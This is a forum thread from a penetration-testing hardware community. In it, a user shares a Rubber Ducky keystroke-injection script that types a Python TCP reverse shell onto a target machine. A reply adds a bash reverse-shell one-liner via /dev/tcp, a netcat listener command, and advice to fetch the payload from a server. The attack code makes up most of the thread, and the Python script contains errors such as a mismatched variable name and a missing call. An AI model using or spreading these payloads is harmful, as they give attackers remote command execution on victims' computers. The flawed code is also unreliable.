Python TCP Reverse Shell

[Skylord]

Hello Hak5 Community!

I have a quick newbie question. I created a Duck script that is supposed to deliver a Python TCP Reverse Shell through the python interpreter, but it is too much for the interpreter to handle. How do I get a pre-created script onto a target machine using the rubber ducky? Very confused.

 

 

Here is my script, it is too much I know :( :

DELAY 2000
CTRL ESC
DELAY 1000
STRING Python
DELAY 200
ENTER
DELAY 500
STRING import socket
ENTER
DELAY 200
STRING import subprocess
ENTER
DELAY 200
STRING def connect():
ENTER
DELAY 200
STRING s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ENTER
DELAY 200
STRING s.connect(("10.0.0.49", 8080))
ENTER
DELAY 200
STRING while True:
ENTER
DELAY 200
STRING command = s.recv(1024)
ENTER
DELAY 200
STRING if 'terminate' in command:
ENTER
DELAY 200
STRING s.close
ENTER
DELAY 200
STRING break
ENTER
DELAY 200
STRING else:
ENTER
DELAY 200
STRING CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
ENTER
DELAY 200
STRING s.send(CMD.stdout.read())
ENTER
DELAY 200
STRING s.send(cmd.stderr.read())
ENTER
DELAY 200
STRING def main():
ENTER
DELAY 200
STRING connect()
ENTER
DELAY 200
STRING main()
ENTER

 

 

[sub0]

If you really want to use Python, have the Ducky grab the script from a server (Or hastebin). However, there are much easier ways to accomplish a backdoor. You can just execute this command: `bash -i >& /dev/tcp/pentesterIPaddr/5000 0>&1` on UNIX systems and catch the shell with Netcat. (nc -l -p 5000)

[Skylord]

Thank you for the reply sub0!

 

Would that bash command work in Windows 10 Powershell?

 

Thank you.

[sub0]

No, that command is for UNIX platforms. If you are targeting Windows, you could use Metasploit.